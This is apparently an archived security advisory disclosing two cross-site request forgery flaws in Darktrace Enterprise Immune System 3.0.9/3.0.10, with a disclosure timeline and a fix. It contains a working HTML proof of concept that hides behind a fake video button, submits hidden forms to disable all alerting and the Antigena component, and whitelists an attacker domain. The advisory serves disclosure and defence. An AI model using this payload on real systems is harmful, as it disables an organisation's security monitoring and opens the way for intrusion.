exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Darktrace Enterpise Immune System 3.0.9 / 3.0.10 Cross Site Request Forgery

Darktrace Enterpise Immune System 3.0.9 / 3.0.10 Cross Site Request Forgery
Posted May 21, 2019
Authored by Gerwout Van der Veen

Darktrace Enterprise Immune System versions 3.0.9 and 3.0.10 contain multiple cross site request forgery vulnerabilities. It is highly likely that older versions are affected as well, but this has not been confirmed. An attacker can whitelist domains and/or change core Darktrace configuration.

tags | exploit, vulnerability, csrf
advisories | CVE-2019-9596, CVE-2019-9597
SHA-256 | 9244da60cca6bb20e28c6e48071ebae23a77caa73e171e154cefdeb20273d3b2

Darktrace Enterpise Immune System 3.0.9 / 3.0.10 Cross Site Request Forgery

Change Mirror Download
1 - Vulnerability
Darktrace Enterpise Immune System 3.0.9 and 3.0.10 contains multiple
cross site request forgery vulnerabilities. It is highly likely that
older versions are affected as well, but this has not been confirmed.
An attacker can whitelist domains and/or change core Darktrace
configuration. The below proof of concept whitelists
www.evilhackers.com, completely disables all types of alerting and it
disables the Antigena component.

Proof of Concept:

<html>
<head>
<title>Darktrace POC - CVE-2019-9596 and CVE-2019-9597</title>
<script>
var myVideo;
var attackWindow;
var attackWindow2;
function playPauseAndExploit() {
if (myVideo.paused) {
attackWindow = window.open('about:blank', 'formwindow',
'scrollbars=no,menubar=no,location=no,titlebar=no,height=100,width=100,resizable=no,toolbar=no,status=no');
attackWindow2 = window.open('about:blank', 'form2window',
'scrollbars=no,menubar=no,location=no,titlebar=no,height=100,width=100,resizable=no,toolbar=no,status=no');
document.getElementById("disable-anti-gena").submit();
document.getElementById("white-list-evil-domain").submit();
myVideo.play();
setTimeout(function(){ attackWindow.close(); attackWindow2.close()}, 1000);
}
else {
myVideo.pause();
}
}
document.addEventListener('DOMContentLoaded', function () {
myVideo = document.getElementById("video1");
}, false);
</script>
</head>
<body>
<div style="text-align:center">
<button onclick="playPauseAndExploit();">Play/Pause Video</button>
<br><br>
<video id="video1" width="800">
<source src="<link towards video file>" type="video/mp4">
Your browser does not support HTML5 video.
</video>
</div>
<form id="disable-anti-gena" target="formwindow" method="post"
action="<domain or ip Darktrace device>/config/">
<input type="hidden" name="AntigenaNetwork" value="false"/>
<input type="hidden" name="HTTPAlerts" value="false"/>
<input type="hidden" name="ActiveMQAlerts" value="false"/>
<input type="hidden" name="CEFSyslogAlerts" value="false"/>
<input type="hidden" name="EmailAlerts" value="false"/>
<input type="hidden" name="JSONSyslogAlerts" value="false"/>
<input type="hidden" name="LEEFSyslogAlerts" value="false"/>
<input type="hidden" name="MobileAppAlerts" value="false"/>
</form>
<form id="white-list-evil-domain" target="form2window" method="post"
action="<domain or ip Darktrace device>/whitelisteddomains">
<input type="hidden" name="newdomain" value="www.evilhackers.com"/>
</form>
</body>
</html>

2 - CVE references
CVE-2019-9596 CSRF /whitelisteddomains
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9596
CVE-2019-9597 CSRF /config
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9597

3 - Vendor
Darktrace Enterprise is Darktrace’s flagship AI cyber defense
solution. It combines real-time threat detection, network
visualization, and advanced investigation capabilities in a single
unified system that is fast and easy to install.

Using proprietary machine learning and AI algorithms, Darktrace
Enterprise works by passively analyzing raw network traffic to form an
evolving understanding of ‘normal’ for every user, device, and subnet
in an organization. Without presuming to know in advance what activity
is ‘malicious’ or not, Darktrace Enterprise independently learns to
detect significant deviations, and immediately alerts the organization
to emerging threats – from subtle insiders and low-and-slow attacks,
through to automated viruses like ransomware.

4 - Timeline
04 December 2018
Notified Darktrace about the discovered vulnerabilities in version
3.0.9 and asked them how to share the vulnerability details.

05 December 2018
Discussed details on the phone with a Darktrace employee. Forwarded
the proof of concept for further investigation.

07 December 2018
Darktrace confirmed the findings. Development team was involved to
resolve the issues.
Update 3.0.10 released to mitigate these issues (i.e. add SameSite lax
cookie support for the session cookie)

10 December 2018
Notified Darktrace that it is still possible to exploit GET requests
(possible on some of the actions on the /config endpoint), because
SameSite property is set to lax. Also mentioned that SameSite is not
fully supported in older browsers. A GET CSRF proof of concept was
sent for further investigation. Received response, stating they are
still working on a permanent fix, but need more time to get this fully
resolved. I suggested enabling strict mode for the SameSite cookie to
further mitigate this issue. This would be a breaking change for the
integration of some SIEM‍ systems that work together with Darktrace.
Darktrace did confirm that the permanent fix should be part of the
upcoming 3.1 release.

04 January 2019
Asked for an eta on the 3.1 release. Got a response that the expected
release date would be at some point in January

26 February 2019
Asked for an eta on the 3.1 release

06 March 2019
Got a response the the release was unfortunately delayed. Registered
CVE-2019-9596 and CVE-2019-9597 with Mitre.

07 March 2019
Asked for an eta on the 3.1 release. Was informed that a release
candidate was ready to be tested. Darktrace also asked I would be
willing to delay publication of the vulnerabilities until 30 days
after the 3.1 release. This would give their customers a reasonable
time frame to upgrade their device. I agreed, given a rapid release of
the final fix.

18 March 2019
Started testing the release candidate and confirmed that the CSRF
issues have all been fully resolved.

01 April 2019
Darktrace releases 3.1 update


5 - Credit
Gerwout van der Veen, eVision Software https://www.evision-software.com

6 - Solution
Upgrade to 3.1 or later release

More details, including a video from the proof of concept is available
at this link: https://www.peerlyst.com/posts/exploiting-two-zero-days-in-a-darktrace-appliance-cve-2019-9596-and-cve-2019-9597-gerwout-van-der-veen

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close